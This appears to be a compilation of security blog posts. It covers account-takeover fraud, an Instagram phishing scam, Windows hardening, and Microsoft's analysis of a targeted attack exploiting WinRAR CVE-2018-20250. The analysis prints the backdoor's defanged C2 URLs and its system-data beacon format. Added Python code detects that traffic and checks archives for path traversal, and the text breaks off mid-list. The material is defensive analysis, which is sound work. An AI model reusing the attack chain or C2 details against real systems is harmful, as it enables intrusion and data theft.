Hackers might place orders using stolen account credentials and then change the shipping location so that the order gets delivered into the hands of the hacker and not to the account holder. Since such accounts would mostly be registered with the retailer, the hacker’s activity would be seen only as normal customer activity. Trouble starts when the customer notices the purchases, mostly at a later stage, and then reports them. The retailer might have to refund the lost money to the customer, and there is almost zero chance of recovering the stolen goods. Such frauds and the costs involved might not affect the business financially beyond an extent, but they would certainly cause reputation damage, which eventually could impact the business in a negative manner. Customer trust, as we all know, is important for any online retailer, and ATO frauds impact customer trust in a negative way. To protect themselves from ATO frauds, retailers can require varying degrees of authentication before any purchase is made. This could make it somewhat difficult for hackers to carry out ATO frauds.
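The "varying degrees of authentication" idea above can be implemented as risk-based step-up authentication at checkout: a few signals that are typical of account takeover (a shipping address changed shortly before the order, an unrecognized device, a burst of failed logins, an unusually large order) are weighted, and the total decides how much extra verification the buyer must complete. The code below is an added example written for this page, not code from the post's author; the signal names, weights and thresholds are assumptions chosen for illustration.

```python
"""Risk-based step-up authentication for checkout (added example, constructed values)."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional, Tuple


@dataclass
class OrderContext:
    """What the checkout service knows about the order being placed."""
    order_value: float
    placed_at: datetime
    shipping_address_changed_at: Optional[datetime]  # None if never changed
    new_device: bool                                  # device fingerprint not seen on this account before
    failed_logins_last_hour: int


# Signal weights are assumed values for this example; a real system would tune them
# against confirmed fraud cases and false-positive rates.
ADDRESS_CHANGE_WINDOW = timedelta(hours=24)
HIGH_VALUE_THRESHOLD = 500.0
FAILED_LOGIN_THRESHOLD = 3


def risk_signals(ctx: OrderContext) -> List[Tuple[str, int]]:
    """Return the (signal name, weight) pairs that fire for this order."""
    signals: List[Tuple[str, int]] = []
    # The ATO pattern in the post: credentials used, then the shipping address is
    # redirected right before ordering. A recent address change weighs the most.
    if (ctx.shipping_address_changed_at is not None
            and ctx.placed_at - ctx.shipping_address_changed_at <= ADDRESS_CHANGE_WINDOW):
        signals.append(("shipping_address_changed_recently", 40))
    if ctx.new_device:
        signals.append(("unrecognized_device", 25))
    if ctx.failed_logins_last_hour >= FAILED_LOGIN_THRESHOLD:
        signals.append(("failed_logins_before_purchase", 20))
    if ctx.order_value >= HIGH_VALUE_THRESHOLD:
        signals.append(("high_order_value", 15))
    return signals


def authentication_step(ctx: OrderContext) -> str:
    """Map the summed risk to the degree of authentication required before purchase."""
    score = sum(weight for _, weight in risk_signals(ctx))
    if score >= 60:
        return "step_up_strong"   # e.g. re-enter password plus a one-time code
    if score >= 30:
        return "step_up_light"    # e.g. confirm the order from a link sent to the account e-mail
    return "none"                 # normal checkout


if __name__ == "__main__":
    now = datetime(2019, 4, 15, 12, 0)
    # Constructed scenario: address redirected two hours ago, unknown device, login failures.
    suspicious = OrderContext(1200.0, now, now - timedelta(hours=2), True, 4)
    print(risk_signals(suspicious), authentication_step(suspicious))
```

Because the decision is derived from the signals rather than from a single rule, a legitimate customer who merely moved house last week is only asked for light confirmation, while the full redirect-and-buy pattern triggers the strong step.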

Related Resources:

Rise in Cyberattacks calls for a rise in Cyber Awareness

Cybersecurity Breaches Against Canadian Companies

Vacuum Cleaner Vulnerabilities Are The New IoT Nightmare

The post Emerging Cybersecurity Threats Affecting Online Retailers appeared first on .

The foundation: Quantifying risk with focused security measurement

When you hear “quantify risk,” you might think it’s the buzz-term du jour. You might be right. Risk quantification is a hot topic right now. It seems everyone who touches security – from the C-suite to the board – has this at the forefront of their mind. As a security leader, you’re likely being asked about quantifying risk, perhaps more so now than ever before. You might be pressed to answer with much confidence. When … More

The post The foundation: Quantifying risk with focused security measurement appeared first on Help Net Security.

Attackers are weaponizing more vulnerabilities than ever before

2018 had the most weaponized vulnerabilities ever (177), which represents a 139% increase compared to 2017, according to the RiskSense latest report. In addition, the rate of exploits discovered in the wild before a patch was available was nearly three times higher last year than the previous record set in 2010. The RiskSense Vulnerability Weaponization Insights Report provides an in-depth analysis of vulnerabilities and weaponization patterns across the Adobe family of products from August 1996 … More

The post Attackers are weaponizing more vulnerabilities than ever before appeared first on Help Net Security.

Scientists may have identified a new way to improve network security

With cybersecurity one of the nation’s top security concerns and billions of people affected by breaches last year, government and businesses are spending more time and money defending against it. Researchers at the U.S. Army Combat Capabilities Development Command’s Army Research Laboratory, the Army’s corporate research laboratory also known as ARL, and Towson University may have identified a new way to improve network security. Many cybersecurity systems use distributed network intrusion detection that allows a … More

The post Scientists may have identified a new way to improve network security appeared first on Help Net Security.

As bad bots grow more sophisticated, so does the number of industries impacted by them

Bot attack sophistication continues to evolve, as advanced attackers learn to adapt their techniques in order to invalidate existing defense tactics, according to Distil Networks. The report investigates hundreds of billions of bad bot requests from 2018 over thousands of domains to provide deeper insight into the daily automated attacks wreaking havoc on websites, mobile apps and APIs. “Bot operators and bot defenders are playing an incessant game of cat and mouse, and techniques used … More

The post As bad bots grow more sophisticated, so does the number of industries impacted by them appeared first on Help Net Security.

The “Nasty List” Phishing Scam Is out to Steal Your Instagram Login

How often do you check your social media accounts? According to a recent study, internet users spend an average of 2 hours and 22 minutes per day on social networking platforms. Since users are pretty reliant on social media, cybercriminals use it as an avenue to target victims with various cyberattacks. The latest social media scheme called “The Nasty List” scams users into giving up their Instagram credentials and uses their accounts to further promote the phishing scam.

So, how exactly do hackers trick innocent users into handing over their login information? Cybercriminals spread this scam by sending messages through hacked accounts to the user’s followers, stating that they were spotted on a “Nasty List.” These messages will read something like “OMG your actually on here, @TheNastyList_34, your number is 15! its really messed up.” If the recipient visits the profile listed in the message, they will see a link in the profile description. An example of one URL that has been listed in these scam profiles is nastylist-instatop50[.]me. The user is tricked into believing that this link will supposedly allow them to see why they are on this list. This link brings up what appears to be a legitimate Instagram login page. When the victim enters their credentials on the fake login page, the cybercriminals behind this scheme will be able to take over the account and use it to further promote the scam.

Images courtesy of Bleeping Computer.

Fortunately, there are a number of steps Instagram users can take to ensure that they don’t fall victim to this trap. Check out the following tips:

  • Be skeptical of messages from unknown users. If you receive a message from someone you don’t know, it’s best to ignore the message altogether or block the user. Additionally, if you think a friend’s social media account has been compromised, look out for spelling mistakes and grammatical errors in their message, which are common in these scams.
  • Exercise caution when inspecting links sent to your messages. Always inspect a URL before you click on it. In the case of this scam, the URL that appears with the fake login page is clearly incorrect, as it ends in [.]me.
  • Reset your password. If your account was hacked by ‘The Nasty List’ but you still have access to your account, reset your password to regain control of your account.

And, as usual, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post The “Nasty List” Phishing Scam Is out to Steal Your Instagram Login appeared first on McAfee Blogs.

From Internet to Internet of Things

Thirty years ago, Tim Berners-Lee set out to accomplish an ambitious idea – the World Wide Web. While most of us take this invention for granted, we have the internet to thank for the technological advances that make up today’s smart home. From smart plugs to voice assistants – these connected devices have changed the modern consumer digital lifestyle dramatically. In 2019, the Internet of Things dominates the technological realm we have grown accustomed to – which makes us wonder, where do we go from here? Below, we take a closer look at where IoT began and where it is headed.

A Connected Evolution

Our connected world started to blossom with our first form of digital communication in the late 1800s – Morse code. From there, technological advancements like the telephone, radio, and satellites made the world a smaller place. By the time the 1970s came about, email became possible through the creation of the internet. Soon enough the internet spread like wildfire, and in the 1990s we got the invention of the World Wide Web, which revolutionized the way people lived around the world. Little did Berners-Lee know that his invention would be used decades, probably even centuries, later to enable the devices that contribute to our connected lives.

Just ten years ago, there were less than one billion IoT devices in use around the world. In the year 2019, that number has been projected to skyrocket to over eight billion throughout the course of this year. In fact, it is predicted that by 2025, there will be almost twenty-two billion IoT devices in use throughout the world. Locks, doorbells, thermostats and other everyday items are becoming “smart,” while security for these devices is lacking quite significantly. With these devices creating more access points throughout our smart homes, it is comparable to leaving a backdoor unlocked for intruders. Without proper security in place, these devices, and by extension our smart homes, are vulnerable to cyberattacks.

Moving Forward with Security Top of Mind

If we’ve learned one thing from this technological evolution, it’s that we aren’t moving backward anytime soon. Society will continue to push the boundaries of what is possible – like taking the first picture of a black hole. However, in conjunction with these advancements, to steer in the right direction, we have to prioritize security, as well as ease of use. For these reasons, it’s vital to have a security partner that you can trust, that will continue to grow to not only fit evolving needs, but evolving technologies, too. At McAfee, we make IoT device security a priority. We believe that when security is built in from the start, user data is more secure. Therefore, we call on manufacturers, users, and organizations to all equally do their part to safeguard connected devices and protect precious data. From there, we can all enjoy these technological advancements in a secure and stress-free way.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post From Internet to Internet of Things appeared first on McAfee Blogs.

DevSecOps: Fast development without sacrificing safety

DevOps has been a boon to companies looking to shorten the systems development cycle, pushing software developers and IT operations to work together and help their enterprises fulfil their business objectives. But while DevOps has been embraced relatively quickly, the same cannot be said for adding security into the mix, even though many software devs and IT and security professionals agree that it would be welcome and the effects of this merger on app security … More

The post DevSecOps: Fast development without sacrificing safety appeared first on Help Net Security.

Building a modern data registry: Go beyond data classification

For organizations, understanding what data they store and analyze is gaining increasing urgency due to new privacy regulations, from the Global Data Privacy Regulation (GDPR) to the California Consumer Privacy Act (CCPA) and Brazil’s General Data Protection Law (LGPD). But these regulations are not the only reason organizations are focused on privacy. Security imperatives and pressure to extract more value from the information they store has also put pressure on companies to get data privacy … More

The post Building a modern data registry: Go beyond data classification appeared first on Help Net Security.

Microsoft 365 security: Protecting users from an ever-evolving threat landscape

In this age of frequent security and data breaches, the statement “We take our customers’ privacy and security very seriously” has been heard from breached companies so often as to become a point of mockery, anger and frustration. But when Rob Lefferts, CVP of Microsoft 365 Security and Compliance, tells me the same thing (and the statement is not in response to a security breach), I believe him. If they didn’t, this cloud-based SaaS offering … More

The post Microsoft 365 security: Protecting users from an ever-evolving threat landscape appeared first on Help Net Security.

A "Department of Cybersecurity"

Presidential candidate John Delaney has announced a plan to create a Department of Cybersecurity.

I have long been in favor of a new federal agency to deal with Internet -- and especially Internet of Things -- security. The devil is in the details, of course, and it's really easy to get this wrong. In Click Here to Kill Everybody, I outline a strawman proposal; I call it the "National Cyber Office" and model it on the Office of the Director of National Intelligence. But regardless of what you think of this idea, I'm glad that at least someone is talking about it.

Slashdot thread. News story.

EDITED TO ADD: Yes, this post is perilously close to presidential politics. Any comment that opines on the qualifications of this, or any other, presidential candidate will be deleted.

Why Cyber Security is Key to Enterprise Risk Management for all Organizations

Large organizations have always focused on managing risk, but the technological breakthroughs that have enhanced our world in countless ways have also transformed how leading executives engage in enterprise risk management (ERM). The pervasive and ever-expanding threat of cyber crime means that comprehensive strategies for cyber security are now absolutely essential for all organizations. After […]… Read More

The post Why Cyber Security is Key to Enterprise Risk Management for all Organizations appeared first on The State of Security.

The Path to Cyber Resilience: Takeaways from the Scalar 2019 Security Study

The annual Scalar Security Study, published in February 2019 and conducted by IDC Canada, identified a new normal across the threat landscape: cybersecurity incidents, be it exfiltration, infiltration or denial of service, occur on a regular basis. Focused on small, midsize and large organizations in Canada, the study confirms that intrusions are inevitable and moreover […]… Read More

The post The Path to Cyber Resilience: Takeaways from the Scalar 2019 Security Study appeared first on The State of Security.

This Week in Security News: 5G Security and Tax Scams

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about cybersecurity and data concerns in 5G. Also, learn about cybercriminal threats during tax season.

Read on:

Securing Enterprises for 5G Connectivity

For the advantages of 5G to be unlocked, ample preparation and planning are necessary. Looking at the changes 5G networks might bring about on an enterprise and its security is a good place to start.

Trend Micro Extends Security Offerings

Trend Micro has announced enhancements to its Deep Security and Cloud App Security products designed to extend protection to virtual machines on the Google Cloud Platform, Kubernetes platform protection, container image scanning integration with the Google Kubernetes Engine (GKE) and Gmail on the G Suite.

What You Need To Know About Tax Scams

While many taxpayers are rushing to file their returns, cybercriminals use the tax season to deceive people into unwittingly handing out credentials, money, and personally identifiable information.

Hackers Go For Smaller Amounts Three Years After $100 Million Heist

In 2018, attempted fraudulent transactions ranged from $250,000 to $2 million, down from tens of millions of dollars in the previous two years, interbank messaging system Swift said in a report.

Mirai Variant Spotted Using Multiple Exploits, Targets Various Routers

Trend Micro researchers uncovered a new variant of the notorious Mirai malware that uses multiple exploits to target various routers and internet-of-things devices.

Yahoo Tries to Settle 3-Billion-Account Data Breach with $118 Million Payout

Yahoo and plaintiffs, in a case over a data breach affecting three billion user accounts, have agreed to and filed a settlement that would require Yahoo to pay $117.5 million.

Ransomware Attack Hinders Michigan County Operations

On April 2, Michigan County reported a ransomware attack on their network, which was more severe than originally thought. The county has not been able to resume normal operations due to the attack.

‘MuddyWater’ APT Spotted Attacking Android

A cyber espionage group believed to be out of Iran and known for targeting telecommunications providers and government bodies in the Middle East has added to its arsenal malware for targeting Android devices.

Phishing Attack Uses Browser Extension Tool SingleFile to Obfuscate Malicious Log-in Pages

Phishing is a permanent staple of cybercrime due to its effectiveness. The concept behind phishing itself is simple, but the strategies used by cybercriminals have become increasingly sophisticated.

Adobe Fixes 24 Critical Flaws in Acrobat Reader, Flash, Shockwave Player

During its regularly scheduled April security update, Adobe overall issued 43 patches, including ones for 24 critical vulnerabilities in eight of its products.

What security techniques or technologies is your enterprise using to prepare for new advancements like 5G? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: 5G Security and Tax Scams appeared first on .

Introducing the security configuration framework: A prioritized guide to hardening Windows 10

In the past, we left defining the security configuration for Windows 10 as a task for every customer to sort out. As a result, we saw as many different configurations as we saw customers. Standardization has many advantages, so we developed a security configuration framework to help simplify security configuration while still allowing enough flexibility to allow you to balance security, productivity, and user experience. We are defining discrete prescriptive Windows 10 security configurations (levels 5 through 1) to meet many of the common device scenarios we see today in the enterprise.

While building out this framework, we thought: what are key considerations for a security professional in today’s world?

Priority

What do I do next?

This is the question security professionals must constantly ask themselves. Nearly every security architect I’ve met with has a pile of security assessments on their desk (and a list of vendors eager to give them more); their challenge is never identifying something that they can do, but identifying which is the next most important thing to do from the massive list they have already identified!

I also get questions from customers who are just now planning their Windows 10 deployment and are hoping to configure as many security features as possible – but since they haven’t deployed yet, they don’t have guidance from the Microsoft Defender ATP Secure Score yet (we’ll discuss that in a minute) – how can they prioritize the features to initially enable? Achieving early wins is a key aspect to driving business value from the investment in this deployment.

Clearly, a key aspect for a security configuration framework is to help drive a smart set of priorities.

Comparison

Understanding where you lie in a continuum of security is also valuable. You see, there is no perfect score in security; everyone could always get better. What we really need to drive is a cycle of continuous improvement. But without an absolute target to pursue, how do you get a sense of how good is good enough? Looking at the posture of others is helpful. Being the best in security is of course aspirational, but being the worst is something you must avoid! There are other unintended consequences of being the “best” to be mindful of as well. Security configuration may be at odds with productivity or user experience; imagine if you worked for a software company and couldn’t test your own code because it wasn’t on your organizational safe programs list yet?

I want to be careful not to overemphasize the competitive aspect here. You don’t want to go deliberately misleading your peers in the industry – in fact, one thing I’m deeply passionate about is improving cooperation among the people on the side of good. Why is this so important? Because bad people have, through innovations of commerce on the dark web, devised a system of cooperation that is shockingly effective. In an environment of inherent distrust (think about it – literally everyone involved is, by definition, untrustworthy), they work together. We’re at a significant disadvantage if we don’t learn to cooperate at least as well!

Secure score in Microsoft Defender ATP

In Microsoft Defender ATP, the secure score is the path to achieving this. Through the top recommendations, we suggest a prioritized list for securing your devices, with a relative ranking of the overall impact to your security posture. We are also exploring ways to provide useful comparisons using this framework.


Secure score represents our best recommendations for securing your endpoint devices (among other things). It’s context-aware, driven by your existing configuration and the threats impacting your environment.

But…

One of the questions we’ve been asking is – what should you do if you have not yet purchased or deployed Microsoft Defender ATP in order to compute your secure score? What if you haven’t even deployed Windows 10? What if you don’t know exactly how to configure a given set of features? We thought we should supplement secure score to help people in all these scenarios with the security configuration framework.

The security configuration framework

The security configuration framework is designed to assist with exactly this scenario. We sat down and asked ourselves this question: if we didn’t know anything at all about your environment, what security policies and security controls would we suggest you implement first? We worked with a select group of pilot customers, experts from Microsoft’s engineering team, and the Microsoft sales field to develop this guidance.

Rather than making an itemized list, we grouped recommendations into coherent and discrete groups, which makes it easier for you to see where you stand in terms of your defensive posture. In this initial draft, we have defined 5 discrete levels of security configuration. Mimicking the DEFCON levels used to determine alert state by the United States Armed Forces, lower numbers indicate a higher degree of security hardening:

Security configuration framework levels 5 through 1

  • Level 5 – Enterprise security – We recommend this configuration as the minimum-security configuration for an enterprise device. Recommendations for this security configuration level are generally straightforward and are designed to be deployable within 30 days.
  • Level 4 – Enterprise high security – We recommend this configuration for devices where users access sensitive or confidential information. Some of the controls may have an impact to app compatibility, and therefore will often go through an audit-configure-enforce workflow. Recommendations for this level are generally accessible to most organizations and are designed to be deployable within 90 days.
  • Level 3 – Enterprise VIP security – We recommend this configuration for devices run by an organization with a larger or more sophisticated security team, or for specific users or groups who are at uniquely high risk (for example, one organization identified users who handle data whose theft would directly and seriously impact their stock price). An organization likely to be targeted by well-funded and sophisticated adversaries should aspire to this configuration. Recommendations for this security configuration level can be complex (for example, removing local admin rights for some organizations can be a long project in and of itself) and can often go beyond 90 days.
  • Level 2 – DevOps workstation – We recommend this configuration for developers and testers, who are an attractive target both for supply chain attacks and credential theft attacks that attempt to gain access to servers and systems containing high-value data or where critical business functions could be disrupted. We are still developing this guidance, and will make another announcement as soon as it is ready.
  • Level 1 – Administrator workstation – Administrators (particularly of identity or security systems) face the highest risk, through data theft, data alteration, or service disruption. We are still developing this guidance, and will make another announcement as soon as it is ready.

How do you choose the configuration that’s best for your organization? If you’re an organization that’s already looking to Windows security baselines to provide advanced levels of security (now also available in preview for Intune), then level 3 incorporates these baselines as the foundation. If you’re earlier in your journey, then you should find level 5 a great starting point and can then balance the enhanced security of higher levels against your application readiness and risk tolerance.

We are releasing this draft version to gather additional feedback from organizations looking to organize their device security hardening program. You can find the draft security configuration framework documentation and provide us feedback at https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-security-configuration-framework/windows-security-configuration-framework.

We are eager to gather feedback on how we could make this guidance more useful, and if there are security controls and configurations you feel may be misplaced (or missing)!


The post Introducing the security configuration framework: A prioritized guide to hardening Windows 10 appeared first on Microsoft Security.

How to Build an Effective ICS Security Program

Industrial control systems (ICS) security is an important concern for businesses in today’s world. Kaspersky Lab is well aware of this fact. It observed as much in its “The State of Industrial Cybersecurity 2018” report when three-quarters of respondents affirmed ICS security to be a top concern for their organization. But the Russian security firm […]… Read More

The post How to Build an Effective ICS Security Program appeared first on The State of Security.

Analysis of a targeted attack exploiting the WinRAR CVE-2018-20250 vulnerability

In early March, we discovered a cyberattack that used an exploit for CVE-2018-20250, an old WinRAR vulnerability disclosed just several weeks prior, and targeted organizations in the satellite and communications industry. A complex attack chain incorporating multiple code execution techniques attempted to run a fileless PowerShell backdoor that could allow an adversary to take full control of compromised machines.

The WinRAR vulnerability was discovered by Check Point researchers, who demonstrated in a February 20 blog post that a specially crafted ACE file (a type of compressed file) could allow remote code execution. Attackers quickly took advantage of the vulnerability in attacks, including a targeted attack that 360 Total Security researchers discovered just two days after disclosure. The exploit has since been observed in multiple malware attacks.

The use of ACE files is not uncommon in malware campaigns. A combination of machine learning, advanced heuristics, behavior-based detections, and detonation enables Office 365 Advanced Threat Protection (ATP) to regularly detect and block a variety of threats that are packed in ACE files, including common malware like Fareit, Agent Tesla, NanoCore, LokiBot and some ransomware families.

The same capabilities in Office 365 ATP detected malicious ACE files carrying the CVE-2018-20250 exploit. We spotted one of these ACE files in the sophisticated targeted attack that we describe in this blog and that stood out because of unusual, interesting techniques. Notably, the attack used techniques that are similar to campaigns carried out by the activity group known as MuddyWater, as observed by other security vendors like Trend Micro.

Attack chain diagram

Figure 1. Attack chain that delivered the CVE-2018-20250 exploit

Attack chain overview

A spear-phishing email purporting to be from the Ministry of Foreign Affairs (MFA) of the Islamic Republic of Afghanistan was sent to very specific targets and asked for “resources, telecommunication services and satellite maps”. The email came with a Word document attachment.

Spear phishing email

Figure 2. Spear phishing email containing lure Word Document

When opened, the document asks the recipient to download another document from a now-inactive OneDrive link. While the URL was down during our analysis, we still reported the case to the OneDrive team.

The use of a document with just a link—no malicious macro or embedded object—was likely meant to evade conventional email security protection. This didn’t work against Office 365 ATP, which has the capability to scan emails and Office documents for URLs and analyze links for malicious behavior.

Figure 3. Word document lure containing OneDrive link

Clicking the link downloads an archive file containing a second Word document, which has a malicious macro. Microsoft Word opens the document with a security warning. Enabling the macro starts a series of malicious actions that lead to the download of the malware payload.

Screenshot of document with malicious macro

Figure 4. Downloaded document with malicious macro

Interestingly, the document has a “Next Page” button. Clicking that button displays a fake message signifying that a certain DLL file is missing, and that the computer needs to restart. This is a social engineering technique that ensures the computer is restarted, which is needed for the payload to run. (More on this later.)

Document with malicious macro and dialog box

Figure 5. Fake message instructing user to restart the computer

Meanwhile, with the macro enabled, the malicious code performs the following in the background:

  • Extract and decode a data blob from a TextBox form and drop it as C:\Windows\Temp\id.png
  • Create a malicious Visual Basic Script (VBScript) and drop it as C:\Windows\Temp\temp.vbs
  • Add persistence by creating a COM object and adding an autorun registry key to launch the created shell object
  • Launch temp.vbs, which is a wrapper for the malicious PowerShell command that decodes the id.png file, producing the second-stage PowerShell script, which is highly obfuscated and contains multi-layered encryption (this PowerShell script is similar to a script used in past MuddyWater campaigns)

The second-stage PowerShell script collects system information, generates a unique computer ID, and sends these to a remote location. It acts as a backdoor and can accept commands, including:

  • Download arbitrary file
  • Run command using cmd.exe
  • Decode a base64-encoded command and run it using PowerShell

The PowerShell script’s ability to accept commands and download programs provided a way for a remote attacker to deliver the malicious ACE file containing the CVE-2018-20250 exploit. When triggered, the exploit drops the payload dropbox.exe.
The next sections discuss in detail the key components of this attack chain.

Malicious macro

The highly obfuscated malicious macro code used in this attack has a unique way of running malicious code by chaining several programs. It first extracts encoded data from UserForm.TextBox, then decodes it and saves it as C:\Windows\Temp\id.png. This file contains an encoded PowerShell command that is decoded and executed later by the first-stage PowerShell script.

Figure 6. Obfuscated macro code

The malicious macro code then creates an Excel.Application object to write the VBScript code.

Figure 7. VBScript code created by the malicious macro

It then runs wscript.exe to launch the PowerShell script at runtime. The PowerShell script itself does not touch the disk, making it a fileless component of the attack chain. Living off the land, the technique of using resources that are already available on the system (e.g., wscript.exe) to run malicious code directly in memory, is another way that this attack tries to evade detection.

PowerShell

The first-stage PowerShell script contains multiple layers of obfuscation. When run, it decodes the file id.png to produce another PowerShell script that’s responsible for the rest of the actions.

Figure 8. Obfuscated first-stage PowerShell code

Figure 9. De-obfuscated first-stage PowerShell script

The decrypted PowerShell script is also highly obfuscated. Fully de-obfuscating the malicious script requires over 40 layers of script blocks.

The second-stage PowerShell script collects system information, such as the operating system, OS architecture, username, domain name, disk information, IP addresses of enabled network adapters only, and gateway IP address. It computes the MD5 hash of the collected system information. The computed hash is used as the BotID (some researchers also refer to this as SYSID).

It then concatenates the hash and system information in a string that looks like the following:

<BotID>**<OS>|Disk information**<IP Address List>**<OS Architecture>**<Hostname>**<Domain>**<Username>**<Gateway IP>

For example:

6e6bdbd3d8b102305f016b06e995a384**Microsoft Windows 10 Enterprise|C:\WINDOWS|\Device\Harddisk0\Partition3**192[.]168[.]61[.]1-192[.]168[.]32[.]1-157[.]59[.]24[.]113**64-bit**<Hostname>**<Domain>**<Username>**131[.]107[.]160[.]113

It then encodes each character of the collected system information as a decimal value by applying a simple custom algorithm with a hardcoded key (public key): 959,713. The result is formatted as XML-like data:

{"data":"665 545 145 145 222 545 222 145 73 367 665 438 438 438 598 616 145 518 616 566 438 [REDACTED] 616 73 145 145 665 518 365 438 316 665 513 513 432 261 181 344}

It sends the encoded data to a hardcoded remote command-and-control (C&C), likely to check and register the infected computer: hxxp://162[.]223[.]89[.]53/oa/.

It continuously waits until the remote attacker sends back “done”. Then, it sends an HTTP request to the same C&C address passing the BotID, likely to wait for a command: hxxp://162[.]223[.]89[.]53/oc/api/?t=<BOTID>.

It can accept commands to download files and execute commands, and sends back the output, encoded in Base64 format, to the remote C2 server using HTTP POST: hxxp://162[.]223[.]89[.]53/or/?t=<BOTID>.
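As an added illustration of the registration format and C2 URL shapes described above (example code written for this page, not the malware's own code or Microsoft's detection logic), the following Python parses a beacon string constructed in the documented layout and scans constructed proxy-log lines for the three C2 URL patterns. The log lines, hostname, domain and user name are made up; the C2 address is the one listed in the indicators of compromise; the decimal encoding with key 959,713 is not reproduced because the page does not describe the algorithm.

```python
import re

# Constructed registration string in the layout documented above:
# <BotID>**<OS>|<Disk info>**<IP list>**<Arch>**<Hostname>**<Domain>**<User>**<Gateway>
# The hostname, domain and user name are invented; the rest mirrors the page's sample.
SAMPLE_BEACON = (
    "6e6bdbd3d8b102305f016b06e995a384**Microsoft Windows 10 Enterprise|C:\\WINDOWS|"
    "\\Device\\Harddisk0\\Partition3**192.168.61.1-192.168.32.1-157.59.24.113"
    "**64-bit**WS-01**CORP**jdoe**131.107.160.113"
)

# C2 host from the indicators of compromise (refanged so it can be compared).
C2_HOST = "162[.]223[.]89[.]53".replace("[.]", ".")

# BotID is an MD5 digest, so exactly 32 lowercase hex characters.
BOTID_RE = re.compile(r"^[0-9a-f]{32}$")

# The three request paths the backdoor uses: register, poll for a command, post output.
C2_PATH_RE = re.compile(r"^/(?:oa/|oc/api/\?t=[0-9a-f]{32}|or/\?t=[0-9a-f]{32})$")


def parse_beacon(beacon: str) -> dict:
    """Split a registration string into named fields; raise ValueError on a bad shape."""
    fields = beacon.split("**")
    if len(fields) != 8:
        raise ValueError(f"expected 8 '**'-separated fields, got {len(fields)}")
    botid, os_and_disk, ips, arch, hostname, domain, username, gateway = fields
    if not BOTID_RE.match(botid):
        raise ValueError("BotID is not a 32-character hex digest")
    # Only the first '|' separates the OS name from the disk information;
    # the disk information itself contains further '|' characters.
    os_name, _, disk_info = os_and_disk.partition("|")
    return {
        "botid": botid, "os": os_name, "disk": disk_info,
        "ips": ips.split("-"), "arch": arch, "hostname": hostname,
        "domain": domain, "username": username, "gateway": gateway,
    }


# Constructed proxy-log lines: timestamp, client IP, method, URL, status.
SAMPLE_PROXY_LOG = f"""\
2019-04-10T09:12:01Z 10.0.0.5 GET http://{C2_HOST}/oa/ 200
2019-04-10T09:12:05Z 10.0.0.5 GET http://{C2_HOST}/oc/api/?t=6e6bdbd3d8b102305f016b06e995a384 200
2019-04-10T09:12:09Z 10.0.0.7 GET http://198.51.100.20/index.html 200
2019-04-10T09:12:12Z 10.0.0.9 POST http://198.51.100.20/or/?t=0123456789abcdef0123456789abcdef 200
"""


def find_c2_hits(log_lines):
    """Return (client, url, reason) for each request matching the backdoor's C2 traffic.

    A request to the known C2 host is reported as such; the same URL shape on any
    other host is reported as a pattern match, since the infrastructure may change.
    """
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        client, url = parts[1], parts[3]
        m = re.match(r"^https?://([^/]+)(/.*)$", url)
        if not m:
            continue
        host, path = m.group(1), m.group(2)
        if C2_PATH_RE.match(path):
            reason = "known C2 host" if host == C2_HOST else "C2 URL pattern"
            hits.append((client, url, reason))
    return hits


if __name__ == "__main__":
    print(parse_beacon(SAMPLE_BEACON))
    for hit in find_c2_hits(SAMPLE_PROXY_LOG.splitlines()):
        print(*hit)
```

The path pattern is kept separate from the host match on purpose: a 32-hex `t=` parameter on `/oc/api/` or `/or/` survives a change of C2 address, whereas the host match alone would not.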

CVE-2018-20250 exploit

In their analysis of the CVE-2018-20250 vulnerability, Check Point researchers found that when parsing ACE files, WinRAR used an old DLL named unacev2.dll that was vulnerable to directory traversal.

Malicious ACE files that carry the CVE-2018-20250 exploit can be spotted through:

  • Directory traversal string – The validation that Unacev2.dll performs on the destination path when extracting an ACE archive is insufficient. If an attacker can craft a relative path that bypasses the checks in place, the embedded payload may be extracted to the specified location.
  • Drop zone – In-the-wild samples commonly use the Startup folder, but it’s also possible to drop the file into known or pre-determined SMB shared folders.
  • Payload – The malicious payload, as in this attack, is commonly an .exe file, but in-the-wild samples and other ACE files that we’ve seen use other malicious scripts, such as VBScript files.
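The root cause of the bug class behind CVE-2018-20250 is an extractor that trusts the member name stored in the archive. The Python below is an added example for this page (not WinRAR's or unacev2.dll's code) of the destination-path check an extractor should enforce before writing anything: it normalizes each member name, rejects absolute paths and drive letters, confirms the normalized result still lies under the extraction directory, and separately notes names aimed at a Startup folder, the drop zone mentioned above. The member names and the base directory are constructed test inputs.

```python
import os
import re

# Drive-letter prefix such as "C:"; such a name ignores the extraction directory.
DRIVE_RE = re.compile(r"^[A-Za-z]:")
# Case-insensitive marker for a Startup folder, the drop zone seen in the wild.
STARTUP_RE = re.compile(r"start menu/programs/startup/", re.IGNORECASE)


def extraction_target(base_dir: str, member_name: str) -> str:
    """Return the absolute path a member would be written to under base_dir.

    Raises ValueError when the member name escapes base_dir: an absolute path,
    a drive letter, or a relative path whose '..' components climb out.  This is
    the containment check an extractor must perform before writing any file.
    """
    # Normalise separators first so "..\\" cannot slip past a "../" check.
    name = member_name.replace("\\", "/")
    if name.startswith("/") or DRIVE_RE.match(name):
        raise ValueError(f"absolute path in archive entry: {member_name!r}")
    base = os.path.abspath(base_dir)
    # abspath collapses "." and ".." components; only then is containment testable.
    target = os.path.abspath(os.path.join(base, *name.split("/")))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path traversal in archive entry: {member_name!r}")
    return target


def audit_members(base_dir: str, member_names):
    """Classify each entry name as 'ok', 'absolute' or 'traversal' and flag
    names aimed at a Startup folder, without writing anything to disk."""
    report = []
    for name in member_names:
        try:
            extraction_target(base_dir, name)
            verdict = "ok"
        except ValueError as exc:
            verdict = "absolute" if "absolute" in str(exc) else "traversal"
        targets_startup = bool(STARTUP_RE.search(name.replace("\\", "/")))
        report.append((name, verdict, targets_startup))
    return report


# Constructed member names; none are taken from the malicious ACE file.
SAMPLE_MEMBERS = [
    "photo1.jpg",                       # ordinary relative name
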